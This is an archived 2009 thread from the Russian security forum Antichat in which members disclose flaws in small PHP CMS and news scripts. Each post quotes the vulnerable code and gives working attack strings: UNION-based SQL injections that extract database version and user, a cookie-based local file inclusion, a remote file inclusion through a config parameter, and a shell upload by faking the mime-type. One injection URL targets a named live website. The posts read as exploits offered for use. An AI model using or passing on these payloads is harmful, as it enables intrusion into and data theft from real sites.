ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
12.11.2009, 01:17
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
IF CMS version 2.0.7 SQL injection
Уязвимость хранится в скрипте frame.php:
PHP код:
...
$id = $_GET['id'];
...
PHP код:
...
$result = $dbi->sql_query("SELECT ban_trgt FROM ".$table->get('banner')." WHERE id_ban='$id'");
...
Реализация:
Код:
localhost/ifcms/frame.php?id=[SQL]
Для успешной реализации требуется magic_quotes = OFF.
oRB, благодарю за доолнение.
Последний раз редактировалось Ins3t; 12.11.2009 в 20:52..
|
|
|
12.11.2009, 23:35
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
Elusive CMS SQL injection
Уязвим скрипт download.php
PHP код:
...
$query = "SELECT * FROM incomming where id='$id'";
$result = mysql_query($query) or die("Query failed");
...
Реализация:
Код:
localhost/download.php?id=[SQL]
Для успешной реализации - magic_quotes_gpc = off
Последний раз редактировалось Ins3t; 13.11.2009 в 00:52..
|
|
|
|
13.11.2009, 00:15
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832
Репутация:
1588
|
|
Model Agency Manager PRO
Bug : Sql Injection
view.php?user_id= [SQL]
Exploit :
Код:
1/**/and/**/1=0%20/**/union/**/all/**/select/**/concat_ws(char(42,42,42),version(),database(),user()),0,0,0/*
or
Код:
1%20union%20select%20user(),2,3,4/*
site:
Код:
http://www.fashionpage.com/view.php?user_id=408/**/and/**/1=0%20/**/union/**/all/**/select/**/concat_ws(char(42,42,42),version(),database(),user()),0,0,0/*&view=photos
|
|
|
|
14.11.2009, 04:52
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: Z-BreakNews v0.1
Далее судьба автора неизвестна.
Думал нигде не встречу этой лабуды,но раз встретилось,напишу.
file: single.php
PHP код:
...
$row=mysql_fetch_array(mysql_query("SELECT * FROM news WHERE id=".$_GET['id']));
...
target: single.php?id=1+union+select+1,2,3,4+--+4
file:insert.php
PHP код:
...
if (($img1_type == $cert1) or ($img1_type == $cert2) or ($img1_type == $cert3))
...
target: Меняем mime-type в заголовках,заливаем шелл.
В довесок скажу, что никто не просит удалять install.php.
Последний раз редактировалось m0Hze; 14.11.2009 в 05:17..
|
|
|
|
14.11.2009, 05:03
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: 3MeMoS-phpNews
Version: 1.1
file: post_news_process.php
PHP код:
...
$query = "INSERT INTO news(title, news, author, date)
VALUES('".$_POST['title']."','".$_POST['news']."','".$_POST['author']."', now())";
...
target: Подменяем $_POST['news'] or $_POST['title'] or $_POST['author'] на необходимый sql-inj запрос.Так как тут insertдело может немножно осложниться.
|
|
|
|
14.11.2009, 16:25
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: Новости 0.1а
Version: 0.1а
Author: jamper@ukr.net
file: comments.php
PHP код:
string 9: $id = $_GET['id'];
...
string 11: $query = "SELECT * FROM news WHERE id=$id";
...
string 28: $query = "SELECT * FROM news_comments WHERE id_news=$id";
...
target: comments.php?id={SQL-inj}
file: edit.php
PHP код:
....
$news = $_GET['news'];
$id = $_GET['id'];
$id2 = $_GET['id2'];
if($news!="")
{
$query = "UPDATE news SET news='$news' WHERE id=$id2";
$result = mysql_query ($query);
}
....
if($id>0)
{
$query = "SELECT * FROM news WHERE id=$id";
$result = mysql_query($query);
target: edit.php?id2={SQL-inj} or edit.php?id={SQL-inj}
//Незнаю кто автор этого чуда,но в каталоге сриптов он есть oO
|
|
|
|
14.11.2009, 22:55
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
TheContactBook.v.beta.3.2
http://sourceforge.net/projects/thecontactbook/files/TheContactBook.v.beta.3.2.zip/download
SQL
popup.php
TableManipulation.class.php
PHP код:
private function getContact($id) {
$SQL = "SELECT * FROM "._MYSQLTABLE_." WHERE "._PKEY_."=$id";
$result = $this->db->query($SQL);
if ($result->countRows()>0) { return $result->fetchRow(); }
http://localhost/TheContactBook.v.beta.3.2/TheContactBook/popup.php?status=details&id=-5+union+select+user(),version(),3,4,5,6,7,8,9,10,1 1+--+
|
|
|
|
15.11.2009, 01:11
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: SuLogu
Author: unnamed
Version: 0.6.2
LFI
file: comments.php
PHP код:
...
if (!$language) {
// try to set the user's preferred language from a previous cookie
if ($_COOKIE['bloglang']) {
$language = $_COOKIE['bloglang'];
} else {
$language = $defaultlanguage;
setcookie("bloglang", $defaultlanguage);
}
} else { // language must exists among defined tags
if (!languageexists($language)) {
$language = $defaultlanguage;
setcookie("bloglang", $defaultlanguage);
}
}
// Include corresponding language file.
include("language/" . $language . ".php");
...
target: Отправляем поддельный запрос на сервер,и подставляем в COOKIES: bloglang={LFI}'%00; За пределы директории у меня не вышел,возможно вам повезет больше (:
Также там множество SQL-inj, но разработчики просто удивляют нас,тем что расчитывают,что везде будет включено registers_global.
Например:
file: index.php
PHP код:
...
function imagenavmenu($id, $page) {
global $showall, $language;
$res = mysql_query("SELECT id FROM blogimages WHERE id < " . $id . " ORDER BY id DESC LIMIT 1");
...
Но $id нигде не будет объявляться,так что скрипт,как и SQL-inj убдет работать только на registers_global = on;
?id=-1+union+select+1,2,3,4,version(),6,7/*
Последний раз редактировалось m0Hze; 15.11.2009 в 15:54..
|
|
|
|
15.11.2009, 01:42
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Сообщение от Grey
А где он в том коде, что ты выложил должен объявляться?
function imagenavmenu($id <------- Вот это, разве не объявление переменной в функции???, $page)
М.б. стоит показать как идёт обращение к функции, может там так:
imagenavmenu($_GET[id] $_GET[page])?
Ты меня совсем не понял, непосредственно в движке,нет вообще обращени к $_GET,$_POST,$_HTTP_VARS.Все расчитано на register_globals = on, во всяком случае тот что у меня.
2jokester, извини что не выкладываю вместе со столбцами.Я не устанавливаю движки на свой компьютер,смотрю непосредственно в блокноте.
Завтра все поправлю.Это же из каталога скриптов ^_^
/addдобавил полный код лфи sulog, забыл строчку с инклудом.
|
|
|
|
15.11.2009, 04:15
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
Minibill CMS 1.2.5
SQL INJECTION:
PHP код:
...
if ($_GET['order_id'])
{
$Q="SELECT * FROM orders WHERE order_id='$_GET[order_id]' AND user_id='$_SESSION[id]' LIMIT 1";
$preOrder = mysql_fetch_assoc(mysql_query($Q));
...
Реализация:
Код:
http://localhost/13/pages/orderform.php?order_id=[SQL]
Версия:
Код:
http://localhost/13/CHANGELOG
Установочный SQL дамп:
Так же можно найти установочный дамп БД с имнами таблиц и колонок (если его админ не потер или не выставил права):
Код:
http://localhost/13/sql/minibill.sql
RFI:
PHP код:
...
include($config['include_dir']."dbConnect.php");
...
Код:
http://localhost/13/crontab/run_invoicing.php?config[include_dir]=http://google.com%00
|
|
|
|
|
 |
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Библиотека
|
SladerNon |
Болталка |
17 |
05.02.2007 23:30 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [x60]unu](/avatars/avatar84758.jpg?1684042){kind=avatar}
Комбинированный вид
